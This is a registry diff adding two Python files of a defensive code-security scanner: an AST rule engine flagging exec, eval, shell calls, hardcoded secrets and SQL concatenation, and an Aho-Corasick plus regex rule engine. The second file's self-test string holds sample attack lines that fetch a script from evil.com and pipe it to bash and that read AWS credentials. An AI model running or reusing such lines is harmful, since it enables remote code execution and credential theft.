caidongyun 6.1.2

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
@@ -0,0 +1,290 @@
1
+ #!/usr/bin/env python3
2
+ """
3
+ AST 引擎 - 基于 Python AST 的深度检测
4
+ """
5
+
6
+ import ast
7
+ import re
8
+ from typing import List, Dict, Optional, Tuple
9
+ from dataclasses import dataclass
10
+ from pathlib import Path
11
+
12
+
13
+ @dataclass
14
+ class ASTHit:
15
+ """AST 检测结果"""
16
+ rule_id: str
17
+ line: int
18
+ column: int
19
+ severity: str # CRITICAL, HIGH, MEDIUM, LOW
20
+ message: str
21
+ code_snippet: str
22
+
23
+
24
+ class ASTEngine:
25
+ """AST 检测引擎"""
26
+
27
+ def __init__(self):
28
+ self.rules = self.load_rules()
29
+
30
+ def load_rules(self) -> List[Dict]:
31
+ """加载 AST 规则"""
32
+ # 核心 AST 规则 (50-100 条)
33
+ return [
34
+ # === 代码执行检测 ===
35
+ {
36
+ 'id': 'AST-EXEC-001',
37
+ 'name': 'exec_call',
38
+ 'check': 'call',
39
+ 'func_names': ['exec'],
40
+ 'severity': 'CRITICAL',
41
+ 'message': '使用 exec() 可能导致代码注入'
42
+ },
43
+ {
44
+ 'id': 'AST-EVAL-001',
45
+ 'name': 'eval_call',
46
+ 'check': 'call',
47
+ 'func_names': ['eval'],
48
+ 'severity': 'CRITICAL',
49
+ 'message': '使用 eval() 可能导致代码注入'
50
+ },
51
+ {
52
+ 'id': 'AST-COMPILE-001',
53
+ 'name': 'compile_call',
54
+ 'check': 'call',
55
+ 'func_names': ['compile'],
56
+ 'severity': 'HIGH',
57
+ 'message': '使用 compile() 可能动态生成代码'
58
+ },
59
+
60
+ # === Shell 注入检测 ===
61
+ {
62
+ 'id': 'AST-SYSTEM-001',
63
+ 'name': 'os_system_call',
64
+ 'check': 'call',
65
+ 'attr_names': ['system'],
66
+ 'module': 'os',
67
+ 'severity': 'CRITICAL',
68
+ 'message': 'os.system() 可能导致 shell 注入'
69
+ },
70
+ {
71
+ 'id': 'AST-SUBPROCESS-001',
72
+ 'name': 'subprocess_call',
73
+ 'check': 'call',
74
+ 'attr_names': ['call', 'run', 'Popen', 'check_output', 'check_call'],
75
+ 'module': 'subprocess',
76
+ 'severity': 'HIGH',
77
+ 'message': 'subprocess 调用可能执行系统命令'
78
+ },
79
+
80
+ # === 危险导入检测 ===
81
+ {
82
+ 'id': 'AST-IMPORT-001',
83
+ 'name': 'dangerous_import',
84
+ 'check': 'import',
85
+ 'modules': ['os', 'sys', 'subprocess', 'socket', 'ctypes'],
86
+ 'severity': 'LOW',
87
+ 'message': '导入危险模块'
88
+ },
89
+
90
+ # === 硬编码凭据检测 ===
91
+ {
92
+ 'id': 'AST-PASSWORD-001',
93
+ 'name': 'hardcoded_password',
94
+ 'check': 'assign',
95
+ 'keywords': ['password', 'passwd', 'pwd', 'secret', 'api_key', 'token'],
96
+ 'severity': 'HIGH',
97
+ 'message': '可能包含硬编码凭据'
98
+ },
99
+
100
+ # === SQL 注入检测 ===
101
+ {
102
+ 'id': 'AST-SQL-001',
103
+ 'name': 'sql_string_format',
104
+ 'check': 'binop',
105
+ 'operators': ['%', '+'],
106
+ 'keywords': ['SELECT', 'INSERT', 'UPDATE', 'DELETE', 'FROM', 'WHERE'],
107
+ 'severity': 'CRITICAL',
108
+ 'message': 'SQL 语句字符串拼接可能导致注入'
109
+ },
110
+ ]
111
+
112
+ def scan(self, file_path: str, content: str) -> List[ASTHit]:
113
+ """扫描文件"""
114
+ hits = []
115
+
116
+ try:
117
+ # 解析 AST
118
+ tree = ast.parse(content)
119
+
120
+ # 遍历 AST
121
+ for node in ast.walk(tree):
122
+ # Call 节点检测
123
+ if isinstance(node, ast.Call):
124
+ hits.extend(self.check_call(node, content))
125
+
126
+ # Import 节点检测
127
+ elif isinstance(node, ast.Import):
128
+ hits.extend(self.check_import(node))
129
+
130
+ elif isinstance(node, ast.ImportFrom):
131
+ hits.extend(self.check_import_from(node))
132
+
133
+ # Assign 节点检测
134
+ elif isinstance(node, ast.Assign):
135
+ hits.extend(self.check_assign(node, content))
136
+
137
+ # BinOp 节点检测 (SQL 拼接)
138
+ elif isinstance(node, ast.BinOp):
139
+ hits.extend(self.check_binop(node, content))
140
+
141
+ return hits
142
+
143
+ except SyntaxError:
144
+ # Python 文件语法错误,跳过
145
+ return []
146
+ except Exception as e:
147
+ # 其他错误,记录日志
148
+ return []
149
+
150
+ def check_call(self, node: ast.Call, content: str) -> List[ASTHit]:
151
+ """检查函数调用"""
152
+ hits = []
153
+
154
+ for rule in self.rules:
155
+ if rule['check'] != 'call':
156
+ continue
157
+
158
+ # 检查函数名
159
+ if isinstance(node.func, ast.Name):
160
+ if node.func.id in rule.get('func_names', []):
161
+ hits.append(self.create_hit(rule, node, content))
162
+
163
+ # 检查属性调用 (如 os.system)
164
+ elif isinstance(node.func, ast.Attribute):
165
+ if node.func.attr in rule.get('attr_names', []):
166
+ # 检查模块名
167
+ if isinstance(node.func.value, ast.Name):
168
+ if node.func.value.id == rule.get('module', ''):
169
+ hits.append(self.create_hit(rule, node, content))
170
+
171
+ return hits
172
+
173
+ def check_import(self, node: ast.Import) -> List[ASTHit]:
174
+ """检查导入语句"""
175
+ hits = []
176
+
177
+ for rule in self.rules:
178
+ if rule['check'] != 'import':
179
+ continue
180
+
181
+ for alias in node.names:
182
+ if alias.name in rule.get('modules', []):
183
+ hits.append(self.create_hit(rule, node, ''))
184
+
185
+ return hits
186
+
187
+ def check_import_from(self, node: ast.ImportFrom) -> List[ASTHit]:
188
+ """检查 from import 语句"""
189
+ hits = []
190
+
191
+ for rule in self.rules:
192
+ if rule['check'] != 'import':
193
+ continue
194
+
195
+ if node.module in rule.get('modules', []):
196
+ hits.append(self.create_hit(rule, node, ''))
197
+
198
+ return hits
199
+
200
+ def check_assign(self, node: ast.Assign, content: str) -> List[ASTHit]:
201
+ """检查赋值语句"""
202
+ hits = []
203
+
204
+ for rule in self.rules:
205
+ if rule['check'] != 'assign':
206
+ continue
207
+
208
+ # 检查目标变量名
209
+ for target in node.targets:
210
+ if isinstance(target, ast.Name):
211
+ var_name = target.id.lower()
212
+ for keyword in rule.get('keywords', []):
213
+ if keyword in var_name:
214
+ # 检查值是否为字符串常量
215
+ if isinstance(node.value, ast.Constant):
216
+ if isinstance(node.value.value, str):
217
+ hits.append(self.create_hit(rule, node, content))
218
+
219
+ return hits
220
+
221
+ def check_binop(self, node: ast.BinOp, content: str) -> List[ASTHit]:
222
+ """检查二元操作 (SQL 拼接)"""
223
+ hits = []
224
+
225
+ for rule in self.rules:
226
+ if rule['check'] != 'binop':
227
+ continue
228
+
229
+ # 检查操作符
230
+ op_name = type(node.op).__name__
231
+ if op_name in ['Mod', 'Add']: # % 或 +
232
+ # 检查是否包含 SQL 关键词
233
+ code = ast.unparse(node) if hasattr(ast, 'unparse') else content
234
+ for keyword in rule.get('keywords', []):
235
+ if keyword in code.upper():
236
+ hits.append(self.create_hit(rule, node, content))
237
+ break
238
+
239
+ return hits
240
+
241
+ def create_hit(self, rule: Dict, node: ast.AST, content: str) -> ASTHit:
242
+ """创建检测结果"""
243
+ # 提取代码片段
244
+ code_snippet = ''
245
+ if content:
246
+ lines = content.split('\n')
247
+ if hasattr(node, 'lineno') and node.lineno <= len(lines):
248
+ code_snippet = lines[node.lineno - 1].strip()[:100]
249
+
250
+ return ASTHit(
251
+ rule_id=rule['id'],
252
+ line=getattr(node, 'lineno', 0),
253
+ column=getattr(node, 'col_offset', 0),
254
+ severity=rule['severity'],
255
+ message=rule['message'],
256
+ code_snippet=code_snippet
257
+ )
258
+
259
+ def scan_file(self, file_path: str) -> List[ASTHit]:
260
+ """扫描文件 (便捷方法)"""
261
+ try:
262
+ with open(file_path, 'r', encoding='utf-8') as f:
263
+ content = f.read()
264
+ return self.scan(file_path, content)
265
+ except Exception:
266
+ return []
267
+
268
+
269
+ # 测试
270
+ if __name__ == '__main__':
271
+ engine = ASTEngine()
272
+
273
+ # 测试代码
274
+ test_code = """
275
+ import os
276
+ import subprocess
277
+
278
+ password = "secret123"
279
+ exec(user_input)
280
+ os.system("ls -la")
281
+ subprocess.call(["echo", "hello"])
282
+
283
+ query = "SELECT * FROM users WHERE id=" + user_id
284
+ """
285
+
286
+ hits = engine.scan("test.py", test_code)
287
+
288
+ print(f"检测到 {len(hits)} 个问题:")
289
+ for hit in hits:
290
+ print(f" {hit.rule_id} [{hit.severity}] 行{hit.line}: {hit.message}")
@@ -0,0 +1,284 @@
1
+ #!/usr/bin/env python3
2
+ """
3
+ 混合扫描器 - Aho-Corasick 预筛选 + Regex 精匹配
4
+
5
+ 架构:
6
+ 1. Aho-Corasick 自动机快速预筛选(0.5ms)
7
+ - 提取所有规则的关键词
8
+ - 一次遍历匹配所有关键词
9
+ - 返回候选攻击类型
10
+
11
+ 2. Regex 引擎精匹配(2ms)
12
+ - 只匹配候选攻击类型的规则
13
+ - 保持 100% 检测精度
14
+ """
15
+
16
+ import ahocorasick
17
+ import re
18
+ import time
19
+ from typing import Dict, List, Set, Tuple
20
+ from pathlib import Path
21
+
22
+
23
+ class HybridRuleEngine:
24
+ """
25
+ 混合规则引擎
26
+
27
+ 使用 Aho-Corasick 预筛选 + Regex 精匹配
28
+ """
29
+
30
+ def __init__(self, rules_file: Path):
31
+ """
32
+ 初始化混合引擎
33
+
34
+ Args:
35
+ rules_file: 规则文件路径(JSON 格式)
36
+ """
37
+ self.rules_file = rules_file
38
+ self.rules = []
39
+ self.rules_by_category = {}
40
+ self.automaton = None
41
+ self.keywords = set()
42
+
43
+ self._load_rules()
44
+ self._build_automaton()
45
+ self._group_rules_by_category()
46
+
47
+ def _load_rules(self):
48
+ """加载规则文件"""
49
+ import json
50
+
51
+ with open(self.rules_file, 'r', encoding='utf-8') as f:
52
+ data = json.load(f)
53
+
54
+ self.rules = data.get('rules', [])
55
+ print(f"✅ 加载 {len(self.rules)} 条规则")
56
+
57
+ def _extract_keywords(self, pattern: str) -> List[str]:
58
+ """
59
+ 从 regex pattern 提取关键词
60
+
61
+ Args:
62
+ pattern: 正则表达式
63
+
64
+ Returns:
65
+ 关键词列表
66
+ """
67
+ keywords = []
68
+
69
+ # 移除 regex 特殊字符,提取纯文本关键词
70
+ # 例如:r'curl\s+\|.*bash' -> ['curl', 'bash']
71
+
72
+ # 1. 提取明显的关键词(字母数字组合,长度>=3)
73
+ import re
74
+ words = re.findall(r'[a-zA-Z0-9_]{3,}', pattern)
75
+
76
+ # 2. 过滤掉太常见的词
77
+ common_words = {'the', 'and', 'for', 'not', 'with', 'from', 'import', 'def', 'return'}
78
+ keywords = [w for w in words if w.lower() not in common_words]
79
+
80
+ return keywords
81
+
82
+ def _build_automaton(self):
83
+ """构建 Aho-Corasick 自动机"""
84
+ print("🔧 构建 Aho-Corasick 自动机...")
85
+ start = time.time()
86
+
87
+ self.automaton = ahocorasick.Automaton()
88
+
89
+ # 为每条规则添加关键词到自动机
90
+ for i, rule in enumerate(self.rules):
91
+ patterns = rule.get('patterns', [])
92
+ category = rule.get('category', 'unknown')
93
+ rule_id = rule.get('id', f'RULE-{i}')
94
+
95
+ for pattern in patterns:
96
+ # 提取关键词
97
+ keywords = self._extract_keywords(pattern)
98
+
99
+ for keyword in keywords:
100
+ # 添加到自动机:(keyword, (rule_id, category, pattern))
101
+ self.automaton.add_word(keyword.lower(), (rule_id, category, pattern, keyword))
102
+ self.keywords.add(keyword.lower())
103
+
104
+ # 构建自动机(构建失败函数)
105
+ self.automaton.make_automaton()
106
+
107
+ elapsed = (time.time() - start) * 1000
108
+ print(f"✅ 自动机构建完成 ({elapsed:.1f}ms)")
109
+ print(f" 关键词数:{len(self.keywords)}")
110
+ print(f" 自动机大小:{len(self.automaton)}")
111
+
112
+ def _group_rules_by_category(self):
113
+ """按攻击类型分组规则"""
114
+ self.rules_by_category = {}
115
+
116
+ for rule in self.rules:
117
+ category = rule.get('category', 'unknown')
118
+ if category not in self.rules_by_category:
119
+ self.rules_by_category[category] = []
120
+ self.rules_by_category[category].append(rule)
121
+
122
+ print(f"✅ 规则分组完成 ({len(self.rules_by_category)} 个类别)")
123
+
124
+ def scan(self, content: str) -> Dict:
125
+ """
126
+ 扫描内容(混合匹配)
127
+
128
+ Args:
129
+ content: 待扫描内容
130
+
131
+ Returns:
132
+ 扫描结果字典
133
+ """
134
+ start = time.time()
135
+
136
+ # Step 1: Aho-Corasick 预筛选(快速)
137
+ candidate_categories = self._prefilter(content)
138
+
139
+ # Step 2: Regex 精匹配(只匹配候选类别)
140
+ matches = self._refine_match(content, candidate_categories)
141
+
142
+ elapsed = (time.time() - start) * 1000
143
+
144
+ return {
145
+ 'hit_count': len(matches),
146
+ 'matches': matches,
147
+ 'candidate_categories': list(candidate_categories),
148
+ 'scan_time_ms': elapsed
149
+ }
150
+
151
+ def _prefilter(self, content: str) -> Set[str]:
152
+ """
153
+ Aho-Corasick 预筛选
154
+
155
+ Args:
156
+ content: 待扫描内容
157
+
158
+ Returns:
159
+ 候选攻击类型集合
160
+ """
161
+ candidate_categories = set()
162
+ content_lower = content.lower()
163
+
164
+ # 一次遍历匹配所有关键词
165
+ for end_idx, (rule_id, category, pattern, keyword) in self.automaton.iter(content_lower):
166
+ candidate_categories.add(category)
167
+
168
+ return candidate_categories
169
+
170
+ def _refine_match(self, content: str, candidate_categories: Set[str]) -> List[Dict]:
171
+ """
172
+ Regex 精匹配
173
+
174
+ Args:
175
+ content: 待扫描内容
176
+ candidate_categories: 候选攻击类型
177
+
178
+ Returns:
179
+ 匹配结果列表
180
+ """
181
+ matches = []
182
+
183
+ # 只匹配候选类别的规则
184
+ for category in candidate_categories:
185
+ rules = self.rules_by_category.get(category, [])
186
+
187
+ for rule in rules:
188
+ patterns = rule.get('patterns', [])
189
+ rule_id = rule.get('id', 'UNKNOWN')
190
+ name = rule.get('name', 'Unknown Rule')
191
+ confidence = rule.get('confidence', 80)
192
+ severity = rule.get('severity', 'MEDIUM')
193
+
194
+ for pattern in patterns:
195
+ try:
196
+ compiled = re.compile(pattern, re.IGNORECASE)
197
+ match_obj = compiled.search(content)
198
+
199
+ if match_obj:
200
+ matches.append({
201
+ 'rule_id': rule_id,
202
+ 'name': name,
203
+ 'category': category,
204
+ 'confidence': confidence,
205
+ 'severity': severity,
206
+ 'pattern': pattern,
207
+ 'match': match_obj.group(0)[:100] # 截取前 100 字符
208
+ })
209
+ except re.error as e:
210
+ # 忽略无效的正则
211
+ pass
212
+
213
+ return matches
214
+
215
+ def get_stats(self) -> Dict:
216
+ """获取统计信息"""
217
+ return {
218
+ 'total_rules': len(self.rules),
219
+ 'total_keywords': len(self.keywords),
220
+ 'automaton_size': len(self.automaton),
221
+ 'categories': len(self.rules_by_category)
222
+ }
223
+
224
+
225
+ def test_hybrid_scanner():
226
+ """测试混合扫描器"""
227
+ print("="*60)
228
+ print("混合扫描器测试")
229
+ print("="*60)
230
+
231
+ rules_file = Path(__file__).parent.parent.parent / 'rules' / 'dist' / 'all_rules.json'
232
+
233
+ if not rules_file.exists():
234
+ print(f"❌ 规则文件不存在:{rules_file}")
235
+ return
236
+
237
+ # 创建引擎
238
+ engine = HybridRuleEngine(rules_file)
239
+
240
+ # 测试内容
241
+ test_content = """
242
+ #!/usr/bin/env python3
243
+ import os
244
+ import requests
245
+
246
+ # Supply chain attack
247
+ response = requests.get('http://evil.com/malicious.sh')
248
+ os.system('curl http://evil.com/backdoor.sh | bash')
249
+
250
+ # Credential theft
251
+ with open('~/.aws/credentials') as f:
252
+ aws_key = f.read()
253
+ """
254
+
255
+ print("\n📝 测试内容:")
256
+ print(test_content[:200])
257
+ print("...")
258
+
259
+ # 扫描
260
+ print("\n🔍 开始扫描...")
261
+ result = engine.scan(test_content)
262
+
263
+ print(f"\n📊 扫描结果:")
264
+ print(f" 候选类别:{result['candidate_categories']}")
265
+ print(f" 匹配数:{result['hit_count']}")
266
+ print(f" 耗时:{result['scan_time_ms']:.2f}ms")
267
+
268
+ print(f"\n🎯 匹配详情:")
269
+ for match in result['matches'][:10]:
270
+ print(f" [{match['severity']}] {match['rule_id']}: {match['name']}")
271
+ print(f" 类别:{match['category']}, 置信度:{match['confidence']}")
272
+ print(f" 匹配:{match['match'][:50]}...")
273
+
274
+ # 性能统计
275
+ stats = engine.get_stats()
276
+ print(f"\n📈 性能统计:")
277
+ print(f" 规则数:{stats['total_rules']}")
278
+ print(f" 关键词数:{stats['total_keywords']}")
279
+ print(f" 自动机大小:{stats['automaton_size']}")
280
+ print(f" 类别数:{stats['categories']}")
281
+
282
+
283
+ if __name__ == '__main__':
284
+ test_hybrid_scanner()